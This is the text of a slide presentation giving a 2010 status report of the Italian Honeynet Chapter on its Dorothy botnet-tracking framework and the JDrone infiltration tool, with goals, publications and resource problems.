Upload
xarles
View
55
Download
0
Embed Size (px)
DESCRIPTION
The Italian Honeynet Chapter. Status Report. Agenda. The Italian HP chapter Goals achieved Ongoing progress Expected goals 3D-Problems Conclusion. The Italian HP Chapter. Founded in 2009 Built around the Dorothy project A framework for tracking botnets - PowerPoint PPT Presentation
Citation preview
The Italian Honeynet Chapter
Status Report
Agenda
• The Italian HP chapter• Goals achieved• Ongoing progress• Expected goals• 3D-Problems• Conclusion
The Italian HP Chapter
• Founded in 2009• Built around the Dorothy project– A framework for tracking botnets
• Currently composed by 4 volounteers– Marco Riccardi : R&D Researcher @ Barcelona Digital– Marco Cremonini : Assistant Professor @ University of
Milan – Davide Cavalca : Information Security Advisor , Freelancer – Luigi D’Amato : CTO @ Partner Security Lab / Member @
Zone-H
Goals achieved during 2010
Goals achieved 1/3
• Java Dorothy Drone Improvement (JDrone)– Tool for (IRC) botnet infiltration – Totally rewritten in Java • totally multiplatform
– yes, even on windows!
– Distribuited infrastructure• Distribuited drone instances• One central Log Server• One Authentication server
The JDrone
• how does it work?
C&C #1 C&C #2
JD-DroneAuthentication Server
JDDroneLog Server
C&CIP: 11.11.11.11:6666Command#1Command#2Command#3
C&CIP: 11.11.11.11:6666Command#1Command#2Command#3
JD-Drone
Dorthy Web GUI
Goals achieved 2/3• Relationship formed
– Telecom Italia, Security Lab (Honeypot implementation, knoledge sharing)
– Barcelona Digital (Server hosting, knowledge sharing)• Graduating student support
– Five graduating students of the University of Milan (DTI) are currently doing their final Thesis on Dorothy related sub-projects.• The JDrone Project - Patrizia Martemucci, Andrea Cavenago • Botnet Protocol Analysis - Marco Addario – 04/2011• Zeus analysis/detection module - Giampaolo Dedola – 02/2011 • Low-Interaction Honeypot Implementation - Stefano Fornara – Stage in
Telecom Italia Labs – 04/2011
Goals achieved 3/3• Attended confereces
– Italian Security Summit 2010, Milan, IT– inBot 2010, Bonn, DE– APWG 2010, Dallas, USA* (paper presented)
• Two IEEE publications– “The Dorothy Project: An Open Botnet Analysis Framework for Automatic Tracking and Activity
Visualization” - Cremonini M., Riccardi M.– “A framework for financial botnet analysis” - Riccardi M., Cremonini M., Oro D.,Vilanova M., Luna J.
• Awards:• Second placed at “Best italian thesis on information security” Clusit 2010• “IEEE eCrime Fighters Scholarship Award”, APWG 2010*
*Paper presented by Barcelona Digital. However the proposed system heavly relies on a customized version of Dorothy.
Ongoing progress
Ongoing progress 1/2
• Porting to Ruby – (+ Rails ...I wish..)
• Porting the virtualization module to VMWare ESXi
• Testing the first beta of the JDrone– any volounteers for betatesting?
• Compatibility with HTTP botnets (Zeus+SpyEye as first) – For Zeus 1.x almost done
Ongoing progress 2/2
• Database migration to Postgres - almost done
• Improving visualization techniques (FlashCharts) – almost done
• Improving the Web GUI– Improving “real time” data visualization (AJAX)– Improving its interactiveness– ...still waiting to kick off this task
Future Goals
“ What are we going to do tonight, Brain?”
Tactical goals
• Tool improvements– Implement the new Dorothy framework
• Finish the database implementation• Finish the ruby porting phase • Finish the new visualization module• Execute Dorothy 24hx7d
– Relase the first beta of the JDRONE• Honeypot Implementation– Implement at least 10 new low interaction honeypots
(dionaea+mwcollectd) among USA, EU, ASIA
Strategic goals• Presentations
• 2011 – Honeynet Project Annual workshop – Paris (Done! )• Presentation about the JDRone as soon as a stable version is relased• …as more than possible!
• Publications• One about data gathered from the new version of the framework
(JDrone included)• ….others will depend on the development progress
• Improve relationships • Italian/Spanish universities • Italian/Spanish CERTS• Italian/Spanish LEAs
3D-Problems
00.5
11.5
22.5
33.5
44.5
5
3D-Problems– Resources($)
• Dorothy needs a big server for its malware analysis module– After 3 years, finally we found it!
– Time (dT)• The big majority of the people involved are currently working
for private companies (even the graduating students)... • The whole project is totally developed during spare time (very
low!) – Space (dS)
• 4 members, 4 cities, 4 companies, 3 countries• Coordination lack
Slow development
Conclusion
• Almost two years of development– So far so good…
• Ongoing work– Dorothy improvement, second version close to be
relased• Expectations– Clear and concrete goals
• Problems– Our 3D problem vision
Lets - Demo!
• The Dorothy WGUI• The JDRone
Questions?
Thank you
• marco riccardi – [email protected]– [email protected]– skype: m4rco-
• Website: – www.honeynet.it